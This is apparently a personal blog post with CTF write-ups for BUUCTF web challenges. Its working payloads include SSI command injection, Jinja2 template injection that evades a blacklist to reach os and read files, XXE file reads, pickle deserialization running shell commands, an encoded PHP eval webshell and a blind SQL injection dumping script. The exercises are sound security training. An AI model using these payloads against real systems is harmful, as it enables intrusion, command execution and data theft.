BUUCTF刷题六
[toc]
[BJDCTF2020]EasySearch
1、访问界面
2、扫描目录找到index.php.swp(不好扫)
3、看出需要admin的值等于password前6为的md5,使用md5脚本爆破
# -*- coding: utf-8 -*-
import multiprocessing
import hashlib
import random
import string
import sys
CHARS = string.letters + string.digits
def cmp_md5(substr, stop_event, str_len,start=0, size=20):
global CHARS
while not stop_event.is_set():
rnds = ''.join(random.choice(CHARS) for _ in range(size))
md5 = hashlib.md5(rnds)
value = md5.hexdigest()
# print value[start: start+str_len]
if value[start: start+str_len] == substr:
print rnds
stop_event.set()
'''
#碰撞双md5
md5 = hashlib.md5(value)
if md5.hexdigest()[start: start+str_len] == substr:
print rnds+ "=>" + value+"=>"+ md5.hexdigest() + "\n"
stop_event.set()
'''
if __name__ == '__main__':
substr = '6d0bc1'
# start_pos = int(sys.argv[2]) if len(sys.argv) > 1 else 0
str_len = 6
cpus = multiprocessing.cpu_count()
stop_event = multiprocessing.Event()
processes = [multiprocessing.Process(target=cmp_md5, args=(substr,
stop_event, str_len))
for i in range(cpus)]
for p in processes:
p.start()
for p in processes:
p.join()
4、抓包发送得到路径,后缀是shtml的
5、百度得到shtml后缀存在ssi注入
<!--#exec cmd="id" -->
6、在网站跟目录下找到flag
<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2 " -->
[GYCTF2020]FlaskApp
1、访问界面
2、在提示页面,发现失败乃成功之母,应该是要失败
3、在加密与解密尝试,得出如果在解密页面处输入1,页面就会报错,发现render_template_string(tmp),存在ssti注入,并且存在waf
4、验证
5、查看源码,发现waf过滤了一些常用
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}
def waf(str):
black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"]
for x in black_list :
if x in str.lower() :
return 1
6、构造payload,通过拼接绕过过滤
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}
7、读取this_is_the_flag.txt
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}
[BSidesCF 2019]Futurella
1、访问界面,是一串鬼画符
2、看不懂,右键查看下,发现flag竟然就在这
[NCTF2019]True XML cookbook
1、访问界面
2、使用bp抓包,xml格式
3、先读取/etc/passwd,存在xxe漏洞
4、读取flag,一直报错
5、使用伪协议读取源码康康,没有可用信息
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=doLogin.php">]>
<user><username>&xxe;</username><password>admin</password></user>
6、到这里就卡主了,查询资料才知道要内网探测,得到网段10.0.44.2
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///proc/net/arp">]>
<user><username>&xxe;</username><password>admin</password></user>
7、使用bp进行爆破
[CISCN2019 华北赛区 Day1 Web2]ikun
1、访问界面,提示要买到lv6
2、注册账户,进行登录
3、使用脚本找到lv6在哪里
import requests
url = 'http://ce6a792f-b7a8-4e42-a0d7-57103fdbd4b8.node4.buuoj.cn:81/shop?page={0}'
for i in range(1,2000):
response = requests.get(url.format(i))
if "lv6.png" in response.text:
print(i)
break
4、lv6太贵了,使用抓包
5、把最后面的折扣改成很大,不能改0,0直接错误,得到新地址,提示只能admin访问
6、接下来就是提高权限,cookie里面带有 jwt,需要破解 jwt,需要把username改成admin
7、使用 c-jwt-cracker 解密秘钥
8、使用https://jwt.io/,进行加密
9、修改cookie
10、右键查看源代码,发现备份文件
11、审计代码,在Admin.py存在python反序列化,这里会直接返回form.html
def post(self, *args, **kwargs):
try:
become = self.get_argument('become')
p = pickle.loads(urllib.unquote(become))
return self.render('form.html', res=p, member=1)
except:
return self.render('form.html', res='This is Black Technology!', member=0)
12、构造payload1
# coding=utf8
import pickle
import urllib
import commands
class payload(object):
def __reduce__(self):
return (commands.getoutput,('cat /flag.txt',))
a = payload()
print urllib.quote(pickle.dumps(a))
13、payload2
# coding=utf8
import pickle
import urllib
class payload(object):
def __reduce__(self):
return (eval,("open('/flag.txt').read()",))
a = payload()
print urllib.quote(pickle.dumps(a))
[MRCTF2020]套娃
1、访问界面
2、右键查看源代码
//1st
$query = $_SERVER['QUERY_STRING'];
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
echo "you are going to the next ~";
}
3、通过php特性将某些字符转为_绕过第一个if
| User input | Decoded PHP | variable name |
|---|---|---|
| %20foo_bar%00 | foo_bar | foo_bar |
| foo%20bar%00 | foo bar | foo_bar |
| foo%5bbar | foo[bar | foo_bar |
4、第二个if通过换行符%0a
5、访问secrettw.php ,提示要local
6、修改请求头没用,右键源代码,发现注释,搜索资料,是jsfuck加密,放到控制台进行解密,提示post传参
7、随便传入参数,得到源码
8、审计代码,存在file_get_contents,应该是要读取flag.php文件,前提条件有两个,ip==='127.0.0.1' 与 2333传入参数===todat is a happy day,第一个可以通过Client-IP:127.0.0.1,第二个可以通过php://input
9、还存在加密,通过反向写
<?php
function unchange($v){
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) - $i*2 );
}
return $re;
}
$b =unchange('flag.php');
echo base64_encode($b);
?>
10、得到 flag
[极客大挑战 2019]RCE ME
1、访问界面
2、禁用了字母与数字,用取反绕过,先查看phpinfo,禁用了很多函数
?code=(~%8F%97%8F%96%91%99%90)();
3、构造shell
<?php
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "\n";
$c='(eval($_POST[1]))';
$d=urlencode(~$c);
echo $d;
?>
/?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%D6);
4、需要执行根目录下的readflag,但没有权限
5、需要绕过,使用蚁剑插件绕过
[BSidesCF 2019]Kookie
1、访问界面,提示需要登录admin账号,提供了cookie账号
2、登录账户抓包,看到cookie存在username
3、修改为admin
[WUSTCTF2020]颜值成绩查询
1、访问界面,输入框应该是sql注入
2、输入1/**/and/**/1=1/**/%23 页面正常过滤了空格
3、输入1/**/and/**/1=2/**/%23,查询失败
4、payload,ASCII大于100,成绩为100
?stunum=1/**/and/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),1,1))>100/**/%23
ASCII大于200,成绩不存在
5、盲注,编写exp
import requests
import time
url='http://4726a7f2-6cf5-40a8-a0e0-0dc1360449ae.node4.buuoj.cn:81/?stunum='
flag = ''
def payload(i,j):
# 爆表名
# payload = "1/**/and/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))>{1}/**/%23".format(i,j)
# 爆列名
# payload = "1/**/and/**/ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),{0},1))>{1}/**/%23".format(i,j)
# 爆字段
payload = "1/**/and/**/ascii(substr((select/**/group_concat(flag,'-',value)/**/from/**/flag),{0},1))>{1}/**/%23".format(i,j)
r = requests.get(url+payload)
if "your score is: 100" in r.text:
res = 1
else:
res = 0
return res
def exp():
global flag
for i in range(1,10000) :
print(i,':')
low = 31
high = 127
while low <= high :
mid = (low + high) // 2
res = payload(i,mid)
if res :
low = mid + 1
else :
high = mid - 1
f = int((low + high + 1)) // 2
if (f == 127 or f == 31):
break
# print (f)
time.sleep(1)
flag += chr(f)
print(flag)
exp()
print('flag=',flag)
[GWCTF 2019]枯燥的抽奖
1、访问界面,提示猜中字符
2、右键查看源代码,发现check.php
3、访问界面
4、存在php伪随机数漏洞
str1='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
str2='Rla1i9br4y'
str3 = str1[::-1]
length = len(str2)
res=''
for i in range(len(str2)):
for j in range(len(str1)):
if str2[i] == str1[j]:
res+=str(j)+' '+str(j)+' '+'0'+' '+str(len(str1)-1)+' '
break
print res
5、使用php_mt_seed工具
6、算出值,得到flag
<?php
mt_srand('54811715');
$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str='';
$len1=20;
for ( $i = 0; $i < $len1; $i++ ){
$str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);
}
echo $str;
?>
版权声明:
本站所有文章除特别声明外,均採用 CC BY-NC-SA 4.0 许可协议。转载请注明来自
weehhd!
喜欢就支持一下吧
打赏
微信
支付宝
微信
支付宝